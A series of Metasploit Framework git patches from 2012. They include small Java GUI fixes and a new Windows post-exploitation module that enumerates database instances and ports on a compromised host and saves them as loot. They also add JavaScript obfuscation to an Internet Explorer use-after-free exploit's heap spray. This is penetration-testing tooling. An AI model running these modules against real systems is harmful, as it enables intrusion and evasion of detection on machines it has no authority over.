z1?GF?ywDZquYCaXzA!hJ+CON2Wwn^L(_GTsdAm7=SSRcR3GmlF=Cw5d$GtQMMFTD>
zZrNp}$nBP0qKwE|XZLfbm$EpdmO8z@&ypwsl<r<y+VYaRba9fU7^ymts^H~vmL2bq
zs*x6*@M}j~R*{pNPOw}fA5@rX=@tyQFxyg(oO^YxWirvzH(Mss^V4mX!M=b44q8q|
z0KRq2@)W0$?kYDdY1Fzw_bk;a1LnkAH<keG*3^28>Pcy7{XvFUYpXAHrr!tFp@g53
zZk<Iie2{`$hAQ~>C)Q!%!0(-J?L+j~#R?kBtV=>D<ho|un^Xidt|AtZd)`{i-DQt8
zo*FRqfVDpfJpam?W+Pvn?ohL=XnNKfYuHoD&OK(`B6=IPKJLv&tar%pB}bu{_$H29
z<Cc8xv=i1U66If-=PJ~SpMV1Qh11H6`e!{-9ZL<aC|N`kZ(VcWJZ~*We36%|o2mmI
zkFp)IX*j`c`)TGzdgDa855(FmW<nK-46Le9x8i}~d))UDv7P}8Nd+X9g+*r%Q!M?;
zDVBj16w9K@9+nrZ=u*id5`A@zQZG_^Ioo{quIjcl6O{c~(^jP(Oi7wzn@pzdnhr<}
zZniX`yEri2R$2@wu4_i2lmrnu!?st1_ptX79R++;Wwy;AA03~gMBC4|&8AMjx5GAy
zf?>cuTYafA7m!pAsImW)IFM^AA)5Nb82NtL_?>N~+y1TX9qRt3-`QG7&Q>)7UrJ8*
zu_LxfQu4<!rL59P+ltb7KKII2mpU}stetfMnhI%ONztP|ZN5^$f1$9Zg8$~FX0uiB
z1EssY12q}^dJ#<qe^RJ6j)HM(4b7YE{;IaNfU4|NPpeD8zPhW{-)S!ehtFwMuDv^~
zpLW^AX9zw(tH`rN<pEj+K3n7t&|<{G0a{5um+o6ie)pcj<K1ED+6<jPa&H)+6*Xl%
z#fsq>HjkcT@r};G0;3p~7;%`@RRpY#SzsMZ@ati5orTqrz$|<j_9s?hKD`Mm;%%4>
zyD^d7!~NKPUI^z)KI|aJUJoXncssD)cn}tB!R#iMviEo>xAQPwn1^G*R*aYC#d%UI
zUV^9MWTY&Q=5O;DUXRD}CcG4H&f|DD9?yG$?E{{`(|IBv&6D`2Jeg17DSSFF$7l02
zE_iu9p9k}$ydux$mH6kpGIqbKibWaPkB*v{KE8!hh+1OUXstefB)%H0)d6s3YR&!0
ze?xC?i2n%7RVp;)69WTG{_b&^+Ogo2@|Y;n9N3QaRh8|ms#>}%2S)8e4aO>Z2zLGR
z&sgnZ`U0(nBNJ<;G1$!+D^4%ac9)tCt{FH6osV7B1#s&^?7}T#HL$bR0;{HuY#Fv9
zm$Q%93bA{kwvw+DT^DJ!92=oz6BdJ;#fC-NkRn^5ZyWa0upNeNsz|J7W3j!F%67S{
zEY|G2>H+L%eu>%ZS1b)%RJ8!>VMX5r8;BjSRn-++Rqtb~XDGI+GO!Arh^?ww*m;|S
zt*UwKq&sto7SF4mhM~V;7vooKz?{W)?>U^lo<}U?VO#71*3TEQDRBw&<jc@~1zWmT
zv32`9bl$*T=q+($sW#K=9#q_inGfL0M`HXkZ5o2rf4LUMX|T2JeX60zO1Jun^DDKY
zqVWaH1YXtF5=7}$+5vI5j@C!CTCMeSCuM7Mq(Ewe8XrpmHv~SW0nlcx*19C%=3`nf
zIkwD=|2QO;pVHz*L}8?}rYAKyz!#p<#t?t_FWQnYz`c*PJj(V<Uuj5Guq9w;<R_Gc
z{DimF?&ZG6?Z|P!w~znpCy93hFDKfOc6-GHh_)+dzv}?3SKS^-uggB~*msl4=qC0%
zI8$-^cd+-ODo1p-%c@^@Q*g|C_9mggpB!VaM0Bt53f7%ue@J7w>I%Cit2S+VyBp<%
z2zQ^A_Lp+Prw1>TX(GZsZ4FT1p0ds^GsMP?_VQSFxUcT8zls99@~geN)N;Rm$pmrn
ziapxh^t?ThD$K~Uw<GxL6$Q&(xBHP#>RBBjcw>p4#T}>dSha*>FsBz)>BZBAwnb34
zWny$=N04YxQV$Y$N;-NFabVp}13m@uQzrhH0pj3j$6Dx!h;g)njv+A)96;@M2bXoU
zraYWp&ar`Dc$y=StS?v5F`J$bS8~L0n%7OPRd&#47-OG_`&AvmqD!nE;ZCdK*hoyj
zS9R1Rq1YOZ56S+8wH!(Ge5AG`+C;(?YdNkpfGrKg=9UmnjMD=}d|gK?va?P9wSmP!
zE6&96U9b~GO{}l$pm*Hux{g$;Afmn_m=srN<fu%~gBm-oq5{#bnPVazFE?|1K<H*I
z94!FF%9f5}#PzPDleB&QkG<Piys>B(KkRbEyB)0^{@$R6_jJ5N@V$>5X#|&KI^HID
zd4{7Q!Q>^5dIX2BSMcjyieEqEs6_a8PCKd*9DmjE7QsUg9JL5~nVc=Xso5{9bY@P}
z>s0m5^KlmSrqH#Os0!2rN3#1yxYLV7{wnS4iEpUf9V<B}qgy6iuj6!Iuj8sa*FxWF
ziL&QhX>Y#P5+9v&VICwlopV)_pJ|Ev=WqnOTa-BOss_;gysIw2`tz>t06rI7%?WwI
z)f8as1s7(0;?V_H1Av+rC77nbFBe^P<u?@csa6K&KN%L0l;?UYvfx)%)Kh=|vNJdI
z6j^z$6v;&&P(8t9ol3F4nOJt_ckdfr@x_AKU-yrI2i|-Z^*@ZPzhu0B$>k?i(iczN
z!9}H@%IyP*bIylKBYo-g-+XNcOO08VJsRmdr?t>VrJ%+a!z5>FkW%^gM@|1`ygEWM
zrd;u;{QJ9>e{=30L!7gwYhvORmo8iM_a`d<X0AO+sy&gfw!jx31>E_?EO3U>2Oxgr
z&b*t8_HV&XCzY@QjHC7&U7iGsK384-=<tlIu255-!xFVkp$-%3_D_VG`@2ha&YPVP
zIH;huZC8lTczIi!^RbS26<vOZ^zYXtHu1hD7XR)d^g2R6ye;d=_vX99_O3W>VvI^b
zt;zSm7$GXaL8cRk%4-mQ>wy#=dQI9rl~AJ|0~I93hv|ND5Ya{pFQf-r0uwkBC(82x
z;k@qhL-pa;U7?nm_=<qAeqxBPUO4hN+;pr+law?xiVA&jmH*4m45%acEtkI#O2IlP
zFpa6FaM+~rrwR`lBhHI0*Ij|8^oEL3;)bGJeERi#Md{Q;QTl=cLq^|#o`%g8Ze}~K
ziJdoGUZiYm#?|&pq|&>JJgOtt=H8U<^S%kO*ft7Z<EG2s28pD~)#u)K1(~Y1SNI9Q
zql!hu+p3eo9RrTEYxT;k68t_){h%vRVhJfXeI#;R55?XAO@@krx1eHSFLD1iJaAzE
zw~4+{x^5?r$=x6+bF#0Z-%v8INajX=g-eDY)$r$o!0xJA_MxH-1qC%sy$$Z5!3wv}
z!yV*a^-ysq4kL;*axQHS$qH+KqSzbWkt(|0fr<{J6mHpgxN^ZA<x06}bpKCR5YJT9
zUzNlkBr$oM!X29miP*bJBD_*cM^(x435wkNuB>F_U5M<MEb{OuHr;i}K$~3guZ4>H
z6N4zyPPxM*?VL4Nu~+#+s%Z8HRIHt^aM)_n#N<Czt(zWnE~WGwz~&6qa9D|4Ad%Bc
z70&mb@@2Q8$CfJYyDJo>4Jh#C2lv2jU8Qi?m6Dzx`HdOjLLDBuR#CcaLDhHe$#{BB
zB4ySq0ye6oh}@!*BK0>Z%5*nGKDjSNCf$cf*Doke{KPJZpynS4XWlMxbN_S&P?yWC
zE2*XEPQ~0Ym)k{?Kc$wAe?lT<k0MO>h{!E1DN=X8qMY(jjwE&pRITXzrJ{sBP}Ru2
zE-5qQ8%62vq3mt%8=z#SeWxhLkHdiLmyt}4?-mChz=G@}igMp0GkVyX%1UPUF-3Xx
zGh}K!ltwpx2$7Q~6d~iGD}XX=;~7iNwMN>YQZRMg_(^eo`%w8+ZlEbs&nSxiNHt=|
z*$SsTrk+)l<Cjrw`$sB1<ffVw%s#Kk3m^!;Z+--WcIPSFs~Zrx0THt5&1M^NDt$VU
z|I5xic}20uK9(w~J%)<BYYI02IFc?mqW`Tic+XQQD82W#<ed8mb?tjBz4AS27;;}}
zc<Is5w{yDw5~rqA3TmkROmV*bm#n|tU#?L8u}H>~*y}WD;tVBw^v`k-Oy4;~)KiRy
z3IU!(eeqy}#dF|kDh2h5LW;G>6B&|;PaxjiPvN=%NA0SaF>io84f~&VMF%O))k=B~
zNp}oUxVs+dw=XO%Ivw>=DOmTl2;z)IkJNt(!S%(J;JtXXXPzhCvOwYUMC4O6^eeOp
z%x8$XNW5b1SO(1UO^3!uJOgEMqM}40BarpIE5}AZ!{G^)g7xoDRh;vlNxd6L`d$U$
z`<&ADGc^;4nD9;KZ_#cl1*N^45GPq*={W>lEtO!C4lw9Rur7NelPJ~Oh?EyFf9rD>
zw$sEB!VT!CaIa7o8JYb<y(jBY1r_>OIsccPS+^^3#zU~<3kW8@M~{KxGvtwQ2>!is
z`tNb{P$W~Wr(eid_$?CNFhZpKh5U1G+&>~F<s~TdGDMS?u99TRsadXb3t$G7$b35h
zvojriL>`#MrkBb$qmI0~8H8S?5><dRuRn1nlRB-=x#|DSl=h)g*YK5ef7e&AW7=Sa
zTc~iG33p|f!eK*KzVGFv<~30&V`rTVs`y%JX#5(uSs4n4Jzh=BcrC};Vj|oaLxd3V
zvtqtQxH&jEAlya6tj&q18Q7ePdZ_8xbcxQN3Xk3Ubw&<GB$a|5am`YU2h;>ND6dKA
z1Rutz6l8pX7Z_FK%@ya-4-Uo!z-?3ta^`+6YH~dZ{XLMw6#tD%5c|z)%1bl4{Y2@t
zMNytWCAhsz!0p;fxT2!ANvC;RTf+5tB!-&w(vj$kpZsQ59E)K<g|>Y1f7zKMLM-A$
zs>NTNHc4%_A!$yF@*pG3x_rgSjq8jkJ<!~)golL9Yfbbw%gO5qGlWLQcqp4ZLiU4m
z#|tU6EKZU_#4E+GTfqNSf<*d>Y8GA2y>|yk_xc(6mrB7AH)60zx9BwD=0nmnX_#<Z
zbZoYZ^Q0&l%d4&vEWtF{lF2;ej7ucr-9jZGzo~%PnZe^kO{-plT+({dnV0~$g9?4H
zpa09w{A7_utj~tN#a7w6byn2*&2n+bD(k$5M|0CP7LmCbJWnop79*cG|H7-5FJn{+
zR{F~Z(ZZ%<Z&M7jLA1$!ix_>-5-P4;kTIGIq^Z~ialxj?kYTqs&d4<(;HVUQL5Aj8
zM57y)BBHt`4Qr%9vgLKrSJSaUB(mtyC@wbPkp`gg-K^|I2s0`LEqbf2c%Vs(g6)v;
zZ79my<zst#%xf$@w(G^9aS=T}=plR@dT|jMqGF+O)eYxFV}~AS>f4(rX<)4D0OPB^
ziV-{26qic~mo-4)E;v;9Pq;J4QZAe^D$)5a2h7ea@ey$r6ODh-Y~qeLrp>fkUhq?w
zwqmIhYm>!URwkkrSVM$Yuud=Y`A$95VxN<b4KFOQHwpXEynO6|Wmct)Mo&c-EGoQJ
zq<HJ$0%sAL7~ztRoJ@p%I~3ttmsIo{;m+<>xM3G%o=MPw^ZQca-q&R_M-gt+Hww2)
z;eH_8jqeoB<t6zdy?|@^y~1@+xPgS*|AWG90FEYti(cyUWRp#CKPt*A4@I71kTXnk
zekMvP^|H^ot<MHlXN*e0T+DtYrZBP8TaB+3o933Ag-_h56ifn}i-;56dMUm~Joko0
z!y`pkUp+wVkG0vwc@w&V{=Q8fh0rq5w6eIO4=n^w?Ge)oLFRb0!W{sPPDMT%6Y-~9
zRGOZbQj{90Haix(x~cyj5#a-o=mbT0jC>($u#VVdQ!>qx6=|W5tYHhWk0_&XSAe4$
z<e`eRXLWf+Nr2H2psX2uqMNNAKIA|tm`F}mBu+{slYKE13yrmjyg9Zg;T<gd=mH@Z
zjQ1e1yDB?Gp25uYMe-{-*+Zfbr@r#K-LSuqq|MVLDOMaWEJNyiVW_H{C6SST2Q`IZ
ziXTYFH>0ULZIL3~Px6l<WRvYS(e*o95wYD*+H-`E3wC;tJ)%^l@&M<AAMClh$3wzN
zjz8s&Da(_O=f88YyZ`2wotb<<vPO#MNRni_Jlr8Irg2}1<NkUgobuWq_5JXzM`>Ds
zG@@YukVOwmWUv?;p!-EZTzl)oAYV)rs1yvQy^n27<i57~izDEL)(cQzu{{TNpr-i?
zzd)s7*<W8xQ0LMA)^N#&GZ$#^6YT<}2?GM5VU^Q^rMEM!<8h!QMn&mCmP20o{5Vwd
z%pl?C*Cch@C!a>!C*-5Ov+JI2Qi3rm1@mhme@)Z~)ryFWAlWC=f)IAID~NSLdL-KM
zJw1L_Rn!bdHl!p(!_Pf6<FN&5sKmVSHzl-cHHou41cwDfa6(%#H&`!GEdK=STV!P_
z1t)!fb%(ih9wY7{BqcK)UwPrBLgin~z4Do>rfYVw_LfVR68}En$u|o&eVi}xDPFoT
zZC(-h=*B!?Gt*50;%E_x%>&k?EfBAZ=xG!y@=$_OzGcB;ur6P%6%&z#CF``JP>`@(
zVgD8Ad7zm;{Z<pX$8ao1xt5g4<BJ&~2;V!0Bq@^4G3bpkDFpoKM?FZ-Yvddu9~_s+
zh=KztDHNnxcQuh>xBH83p~wr+e{0$2R+&Z2gC2WG>p+73T;gB))Pwwk+wI~-s4_~P
zflx9rAAaGXR}IqxC|*RH>J`lij8Q3=O&-0LtVPAtFc~ik!r+Uf1UnNcY4#xTz@`Fy
z(>$LI*YPr^5|ZB+fZ3VhX^J;Mq*u4wL}a*BlNb)~SFbJ_hU=v$#7t)cO6<@Xqf#(n
zpVtwy!}S<6Z4YEDH(EfQZ%2EiC=@I^$0q{VW~~)ALb{ne^!150gN5vYpW4}lPj`Ea
znCXyJ?;wHJos>X$L2o-FL0df>wA`uo08u?sxqGLh<9gu}iP*R_GM_dXG#IsvB*HTD
zu>&Tdjr3-xBzS{pg%^MpwaV@%LXq1bkrIWb7hNoxMB#0;TYQX1OVwrhOgIq23JVi1
zQjklmT|N^R6sw~cSjVo)XRT69>T3q9Y1d{kpqL&*t~_+F-?#FEGYq_fFUy@L#r@)X
zh&WzMjcYnn3Z>!sKb%ibDb9%EigRD`nV0{~+42{~+26xyN-W~@-<+F%Q=I1=N@tk(
z%Ih=+JC%ZY+<B2WDOpFBKs1NHw2SH`^e8-c#j~kWh{!Fa`-zFg9Z@19R(5JG5ekPY
zLYESbqWOfPB|(@NrU*FlqA6-R;bOuS4kukjME}xK%XdV0=pj5+%;C|%HHc8mO`@e4
z0||F0Ug0X2b%ct2(Ne+pM5vvh2rr}c;;1bu2Dk@_3fDYF&aXcvoHIq?K97+~zbD+%
zRF7<oo&wpVSl|wqQ8=8U;d=xzjc~imDcnAVyG6K{X@v6^VWnifHA?}PURmMx*K!n-
zE};l1I<><5bDS|Mr3(z!WmSot&Wm1>^ug-%7$B14^e7Vi`}B>mQUwHC*LcHerSmx7
ze3!0`gPvST^%I5aIZEbtj8{Ae4{MSbmPhfjx#_@hFL8ic(Y}$#Vi<FRc<a?syqK2<
zN$q6Oi|A=n--abr3ci|>>M8b-%^ZRG#*8QpJv%&v4W;Em^c>-$8z^S)1U;J69-rKF
z;bf?!Qc&&ihKlpMmQedgDcS3j6Ue+qim*FDk0TXtjuCOBSI}2$8jIXyJzB&i>i7yw
zR855RgANjxl9HI-zgN=++~jY@=?wn&1zI4SnqEKPo)=?O;$Tt!FFUhxU#03yqRfT2
zN!3RmD_nAtni4-f+ikQJMo=jzy<>vnoCr=BvM34CR(w=K#$EJC??@bV#{@|#1*My0
zE6&a99X3%dS$d*jGE~g}LJ?*r>xIb^<7WP7JcQ{~3VI^%0CD1fiV)98F!To{SSZe6
z#eYEYPbY|GDPU-SPBF|$k)B&axFxp~?)8KJ6?#n!m!2wyTB+DCggI}{S<#|`=A_x3
zqUI8W=mN09s12#eJ`)2KGPUA=bxr52*9nnm7nRujegVwR{Jw;g3l-JN=tZHdT^T4#
zO?8U?m7I}cei_}1rkJ6#Z+0m(moq8_-<x~!2hhgnJS4Db11tT_4vXZGJhT=1@f7~*
Gp8Y?mEiY35

diff --git a/external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java b/external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java
index fc068405a5..819d4b56d7 100644
--- a/external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java
+++ b/external/source/gui/msfguijava/src/msfgui/DraggableTabbedPane.java
@@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
 import java.awt.event.MouseAdapter;
 import java.awt.event.MouseEvent;
 import java.awt.event.MouseMotionAdapter;
+import java.awt.event.MouseMotionListener;
 import java.awt.event.WindowEvent;
 import java.awt.event.WindowFocusListener;
 import java.util.ArrayList;
@@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
 	static{
 		//Set up placeholder window. (Shows when moving tabs)
 		window = new JWindow();
-		window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER);
+		JLabel lab = new JLabel("Moving", JLabel.CENTER);
+		lab.addMouseMotionListener(new MouseMotionListener() {
+			public void mouseMoved(MouseEvent e) {
+				window.setVisible(false);
+			}
+			public void mouseDragged(MouseEvent e) {
+				window.setVisible(false);
+			}
+		});
+		window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
 		window.setSize(300, 300);
 	}
 
@@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
 		//Set up dragging listener
 		addMouseMotionListener(new MouseMotionAdapter() {
 			public void mouseDragged(MouseEvent e) {
-				if (!dragging) {
+				if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
 					// Gets the tab index based on the mouse position
 					int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
 					if (tabNumber < 0)
diff --git a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java
index f8635c3bcf..b1b7d2c2ac 100644
--- a/external/source/gui/msfguijava/src/msfgui/RpcConnection.java
+++ b/external/source/gui/msfguijava/src/msfgui/RpcConnection.java
@@ -114,7 +114,8 @@ public abstract class RpcConnection {
 	 * @throws IOException
 	 */
 	protected void disconnect() throws SocketException, IOException{
-		connection.close();
+		if(connection != null)
+			connection.close();
 	}
 
 	/**

From cb099d34310736edc438f11cf0616274c0a92543 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Mon, 24 Sep 2012 20:34:26 +0200
Subject: [PATCH 06/17] fixing and cleanup for pull #802

---
 modules/post/windows/gather/enum_db.rb | 339 +++++++++++++++++++++++++
 1 file changed, 339 insertions(+)
 create mode 100644 modules/post/windows/gather/enum_db.rb

diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb
new file mode 100644
index 0000000000..2d34e528ae
--- /dev/null
+++ b/modules/post/windows/gather/enum_db.rb
@@ -0,0 +1,339 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'rex'
+require 'msf/core'
+require 'msf/core/post/file'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
+
+class Metasploit3 < Msf::Post
+
+	include Msf::Post::File
+	include Msf::Post::Common
+	include Msf::Post::Windows::Registry
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'          => 'Windows Gather Database Instance Enumeration',
+			'Description'   => %q{ This module will enumerate a windows system for installed database instances },
+			'License'       => MSF_LICENSE,
+			'Author'        => [
+				'Barry Shteiman <barry[at]sectorix.com>', # Module author
+				'juan vazquez' # minor help
+			],
+			'Platform'      => [ 'windows' ],
+			'SessionTypes'  => [ 'meterpreter' ]
+		))
+	end
+
+	# method called when command run is issued
+	def run
+
+		results = []
+
+		print_status("Enumerating Databases on #{sysinfo['Computer']}")
+		if check_mssql
+			results += enumerate_mssql
+		end
+		if check_oracle
+			results += enumerate_oracle
+		end
+		if check_db2
+			results += enumerate_db2
+		end
+		if check_mysql
+			results += enumerate_mysql
+		end
+		if check_sybase
+			results += enumerate_sybase
+		end
+
+		if results.empty?
+			print_status("Done, No Databases were found")
+			return
+		end
+
+		print_status("Done, Databases Found.")
+
+		tbl = Rex::Ui::Text::Table.new(
+			'Header'  => "Installed Databases",
+			'Indent'  => 1,
+			'Columns' =>
+				[
+					"Type",
+					"Instance",
+					"Database",
+					"Port"
+				])
+
+		results.each { |r|
+			report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}")
+			tbl << r
+		}
+
+		print_line(tbl.to_s)
+		p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases")
+		print_status("Results stored in: #{p}")
+
+	end
+
+	##### initial identification methods #####
+
+	# method for Checking if database instances are installed on host - mssql
+	def check_mssql
+		key = "HKLM\\SOFTWARE\\Microsoft"
+		if registry_enumkeys(key).include?("Microsoft SQL Server")
+			print_status("\tMicrosoft SQL Server found.")
+			return true
+		end
+	return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - oracle
+	def check_oracle
+		key = "HKLM\\SOFTWARE\\Oracle"
+		if registry_enumkeys(key).include?("ALL_HOMES")
+			print_status("\tOracle Server found.")
+			return true
+		elsif registry_enumkeys(key).include?("SYSMAN")
+			print_status("\tOracle Server found.")
+			return true
+		end
+	return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - db2
+	def check_db2
+		key = "HKLM\\SOFTWARE\\IBM\\DB2"
+		if registry_enumkeys(key).include?("GLOBAL_PROFILE")
+			print_status("\tDB2 Server found.")
+			return true
+		end
+	return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - mysql
+	def check_mysql
+		key = "HKLM\\SOFTWARE"
+		if registry_enumkeys(key).include?("MySQL AB")
+			print_status("\tMySQL Server found.")
+			return true
+		end
+	return false
+	rescue
+		return false
+	end
+
+	# method for Checking if database instances are installed on host - sybase
+	def check_sybase
+		key = "HKLM\\SOFTWARE\\Sybase"
+		if registry_enumkeys(key).include?("SQLServer")
+			print_status("\tSybase Server found.")
+			return true
+		elsif registry_enumkeys(key).include?("Server")
+			print_status("\tSybase Server found.")
+			return true
+		end
+	return false
+	rescue
+		return false
+	end
+
+	##### deep analysis methods #####
+
+	# method to identify mssql instances
+	def enumerate_mssql
+		results = []
+		key = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\Instance Names\\SQL"
+		instances = registry_enumvals(key)
+		if not instances.nil? and not instances.empty?
+			instances.each do |i|
+				tcpkey = "HKLM\\SOFTWARE\\Microsoft\\Microsoft SQL Server\\#{registry_getvaldata(key,i)}\\MSSQLServer\\SuperSocketNetLib\\Tcp\\IPAll"
+				tcpport = registry_getvaldata(tcpkey,"TcpPort")
+				print_good("\t\t+ #{registry_getvaldata(key,i)} (Port:#{tcpport})")
+				results << ["mssql","instance:#{registry_getvaldata(key,i)} port:#{tcpport}","Microsoft SQL Server",tcpport]
+			end
+		end
+		return results
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify oracle instances
+	def enumerate_oracle
+		results = []
+		basekey = "HKLM\\SOFTWARE\\Oracle\\SYSMAN"
+		instances = registry_enumkeys(basekey)
+		if instances.nil? or instances.empty?
+			print_error("\t\t! Oracle instances not found")
+			return results
+		end
+
+		instances.each do |i|
+			key = "#{basekey}\\#{i}"
+			val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
+			val_ORACLE_HOME = registry_getvaldata(key,"ORACLE_HOME")
+
+			if not exist?(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
+				print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
+				next
+			end
+
+			data_TNSNAMES = read_file(val_ORACLE_HOME + "\\NETWORK\\ADMIN\\tnsnames.ora")
+			if data_TNSNAMES =~ /PORT\ \=\ (\d+)/
+				port = $1
+				print_good("\t\t+ #{val_ORACLE_SID} (Port:#{port})")
+				results << [ "oracle","instance:#{val_ORACLE_SID} port:#{port}","Oracle Database Server",port ]
+			else
+				print_error("\t\t! #{val_ORACLE_SID} (No Listener Found)")
+			end
+		end
+
+		return results
+
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify mysql instances
+	def enumerate_mysql
+		results = []
+		basekey = "HKLM\\SOFTWARE\\MySQL AB"
+		instances = registry_enumkeys(basekey)
+		if  instances.nil? or instances.empty?
+			return results
+		end
+		instances.each do |i|
+			key = "#{basekey}\\#{i}"
+			val_location = registry_getvaldata(key,"Location")
+
+			data = find_mysql_conf(val_location)
+
+			if data and data =~ /port\=(\d+)/
+				port = $1
+				print_good("\t\t+ MYSQL (Port:#{port})")
+				results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port]
+			else
+				print_error("\t\t! could not identify information")
+			end
+		end
+		return results
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify sybase instances
+	def enumerate_sybase
+		basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer"
+		instance = registry_getvaldata(basekey,"DSLISTEN")
+		location = registry_getvaldata(basekey,"RootDir")
+		results = []
+
+		if not exist?(location + "\\ini\\sql.ini")
+			print_error("\t\t! could not locate configuration file.")
+			return results
+		end
+
+		data = read_file(location + "\\ini\\sql.ini")
+		if data =~ /\[#{instance}\]([^\[]*)/
+			segment = $1
+		else
+			print_error("\t\t! couldnt locate information.")
+			return results
+		end
+
+		if segment =~ /master\=\w+\,[^\,]+\,(\d+)/
+			port = $1
+		else
+			print_error("\t\t! couldnt locate information.")
+			return results
+		end
+
+		print_good("\t\t+ #{instance} (Port:#{port})")
+		results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ]
+		return results
+	rescue
+		print_error("\t\t! couldnt locate information.")
+		return results || []
+	end
+
+	# method to identify db2 instances
+	def enumerate_db2
+		results = []
+		cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist")
+		cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg")
+		if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/
+			port = $1
+		else
+			print_error("\t\t! could not identify instances information")
+			return results
+		end
+
+		windir = session.fs.file.expand_path("%windir%")
+		getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
+
+		data = nil
+		getfile.each do |file|
+			if exist?("#{file['path']}\\#{file['name']}")
+				data = read_file("#{file['path']}\\#{file['name']}")
+				break if not data.nil?
+			end
+		end
+
+		if data and data =~ /#{port}[\ \t]+(\d+)/
+			port_t = $1
+		else
+			print_error("\t\t! could not identify instances information")
+			return results
+		end
+
+		cmd_i.split("\n").compact.each do |line|
+			stripped=line.strip
+			print_good("\t\t+ #{stripped} (Port:#{port_t})")
+			results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ]
+		end
+
+		return results
+
+	rescue
+		print_error("\t\t! could not identify instances information")
+		return results || []
+	end
+
+	##### helper methods #####
+
+	def find_mysql_conf(val_location)
+		data = nil
+		if exist?(val_location + "\\my.ini")
+			data = read_file(val_Location + "\\my.ini")
+		elsif exist?(val_location + "\\my.cnf")
+			data = read_file(val_location + "\\my.cnf")
+		else
+			sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
+			getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
+			getfile.each do |file|
+				if exist?("#{file['path']}\\#{file['name']}")
+					data = read_file("#{file['path']}\\#{file['name']}")
+					break
+				end
+			end
+		end
+		return data
+	end
+
+end
\ No newline at end of file

From 2784a5ea2d7b9aceadab811ca90ce96bca945b81 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Mon, 24 Sep 2012 21:28:34 +0200
Subject: [PATCH 07/17] added js obfuscation for heap spray

---
 modules/exploits/windows/browser/ie_execcommand_uaf.rb | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index c13609a069..aa7dac9eaa 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -78,6 +78,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'     => false,
 			'DisclosureDate' => "Sep 14 2012",  # When it was spotted in the wild by eromang
 			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
+			], self.class)
+
 	end
 
 	def get_target(agent)
@@ -283,6 +289,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		js = heaplib(js, {:noobfu => true})
+		if datastore['OBFUSCATE']
+			js = ::Rex::Exploitation::JSObfu.new(js)
+			js.obfuscate
+		end
 
 		html = <<-EOS
 		<html>

From 25e6990dc73a4c520c8bccaf46bfe5576d4e9f23 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Mon, 24 Sep 2012 21:49:32 +0200
Subject: [PATCH 08/17] added osvdb reference

---
 modules/exploits/linux/http/zen_load_balancer_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb
index fbf7cbe588..118ddfc133 100644
--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					['OSVDB', '85654'],
 					['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
 				],
 			'DefaultOptions'  =>

